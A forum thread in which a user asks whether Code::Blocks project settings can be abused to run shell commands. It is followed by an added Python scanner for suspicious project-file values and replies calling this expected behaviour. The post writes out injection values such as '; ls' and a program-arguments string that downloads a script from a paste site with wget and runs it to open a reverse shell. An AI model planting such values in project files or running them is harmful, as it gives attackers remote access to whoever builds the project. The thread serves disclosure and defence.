Is this maybe a security problem?

hrkljus:
Hi, I'm new here and I wasn't sure where to post this.

I'm wondering if the following would be considered a security problem, and if it's worth reporting it as a bug:

In a Code::Blocks project, it is possible to inject shell commands via the "Set programs' arguments" option, e.g. setting the program's arguments to "; ls" and pressing F9 in a default Hello World project will result in the following output:


--- Code: ---
Hello world!
bin  hello.cbp  hello.depend  main.cpp  obj

Process returned 0 (0x0)   execution time : 0.013 s
Press ENTER to continue.

--- End code ---

Same can be done with compiler options, though it's a bit trickier. Setting "|| ls #" as the first compiler option will make the compilation fail, though the command ("ls") will still get executed.

Now on one hand, this may be expected and nothing unusual, but on the other hand it can be used to hide malicious code in a Code::Blocks project which will get executed once the victim compiles/runs it.

Here's an attack scenario:

An attacker creates a Code::Blocks project with some clean source code, but sets up the compile options/program arguments so that it would give him a reverse shell.
He then distributes the project, and the victims that compile/run it unknowingly give him access to their computer.

I've created a simple proof of concept - a Hello World project in C++ that, once run, creates a reverse shell that connects to localhost:12345.

You can test it out on a Linux/Unix system by creating a listener in a terminal first:


--- Code: ---
nc -vlp 12345
--- End code ---

And then running the project with F9.
Once run, you should have a shell on your listener terminal.

The program arguments are set up like this:


--- Code: ---
; wget -qO /tmp/r.py http://pastebin.com/raw/mMfKfkUU && python /tmp/r.py
--- End code ---

Which will download a python script with a simple reverse shell that forks to the background so that the program normally finishes once run from Code::Blocks.

Here's a screenshot:


Is this something worth reporting or is it simply an accepted risk/expected behavior?

EDIT: Forgot to attach the proof of concept project.
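
The settings described in the post above are stored in the project file, so they can be reviewed before the project is opened in the IDE. The following is an added example, not part of the original thread or of Code::Blocks: a scanner that flags shell metacharacters in any attribute of a project file. The sample project is constructed, and its element and attribute names are an assumption about the .cbp XML layout; the scanner does not depend on them.

```python
import re
import xml.etree.ElementTree as ET

# Separators, pipes, substitution and redirection that a shell would act on.
SHELL_META = re.compile(r"[;|&`<>\n]|\$\(")

# Constructed sample. Element and attribute names are an assumption about
# the .cbp layout; the two flagged values are the ones quoted in the post.
SAMPLE_CBP = """<CodeBlocks_project_file>
  <Project>
    <Option title="hello" />
    <Build>
      <Target title="Debug">
        <Option output="bin/Debug/hello" />
        <Option parameters="; ls" />
        <Compiler>
          <Add option="|| ls #" />
          <Add option="-Wall" />
        </Compiler>
      </Target>
    </Build>
    <Unit filename="main.cpp" />
  </Project>
</CodeBlocks_project_file>
"""


def scan_project(xml_text):
    """Return (element path, attribute, value) for every attribute value
    that contains a shell metacharacter."""
    findings = []

    def walk(elem, path):
        here = f"{path}/{elem.tag}"
        for name, value in elem.attrib.items():
            if SHELL_META.search(value):
                findings.append((here, name, value))
        for child in elem:
            walk(child, here)

    walk(ET.fromstring(xml_text), "")
    return findings


if __name__ == "__main__":
    for path, attr, value in scan_project(SAMPLE_CBP):
        print(f"{path} @{attr} = {value!r}")
```

A hit is a prompt for manual review, not proof of malice: some legitimate settings may contain these characters, and the check says nothing about what the project's source code itself does once compiled and run.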

oBFusCATed:
Can a user find the problem by inspecting the project with a text editor or using cb's guis?

dmoore:
Expected behavior I would say. Aka, don't run projects from untrusted sources  :o

I think the only security risks that we have to worry about are malware, privilege escalation or network backdoor bugs that are somehow baked into the IDE itself. Just like you don't blame the terminal for crap people might run in it, the IDE can't be blamed for crap people put into projects.

raynebc:
Same risk somebody could get by running untrusted build scripts or makefiles?

yvesdm3000:
And what about the compiled code? Once you execute it, it can also do whatever the programmer wrote...

Yves
